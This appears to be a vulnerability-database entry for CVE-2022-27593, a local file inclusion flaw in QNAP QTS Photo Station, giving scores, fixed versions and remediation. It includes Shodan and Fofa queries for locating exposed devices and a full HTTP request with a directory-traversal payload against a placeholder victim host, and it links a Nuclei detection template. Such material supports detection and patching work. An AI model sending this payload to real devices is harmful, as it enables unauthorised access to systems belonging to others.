| Title | QNAP QTS Photo Station External Reference - Local File Inclusion |
|---|---|
| Author | allenwest24 |
| Severity | Critical |
| Impact | An attacker can exploit this vulnerability to read sensitive files, execute arbitrary code, or launch further attacks. |
| Remediation | Apply the latest security patches and updates provided by QNAP to fix the local file inclusion vulnerability in QTS Photo Station. |
| CVSS Score | 9.1 |
| EPSS Score | 0.93262 |
| CVE ID | CVE-2022-27593 |
| CWE ID | CWE-610 |
| Shodan Query | title:"QNAP"http.title:"photo station"http.title:"qnap"content-length: 580 "http server 1.0" |
| Fofa Query | title="photo station"title="qnap" |
| Tags | cve2022 cve qnap lfi kev vkev vuln |
QNAP QTS Photo Station External Reference is vulnerable to local file inclusion via an externally controlled reference to a resource vulnerability. If exploited, this could allow an attacker to modify system files. The vulnerability is fixed in the following versions: QTS 5.0.1: Photo Station 6.1.2 and later QTS 5.0.0/4.5.x: Photo Station 6.0.22 and later QTS 4.3.6: Photo Station 5.7.18 and later QTS 4.3.3: Photo Station 5.4.15 and later QTS 4.2.6: Photo Station 5.2.14 and later.
GET /photo/combine.php?type=javascript&g=core-r7rules/../../../hello.php. HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-27593.yaml
🦈 Packet Capture: ⬇️ Download cve-2022-27593.pcap
N/AN/A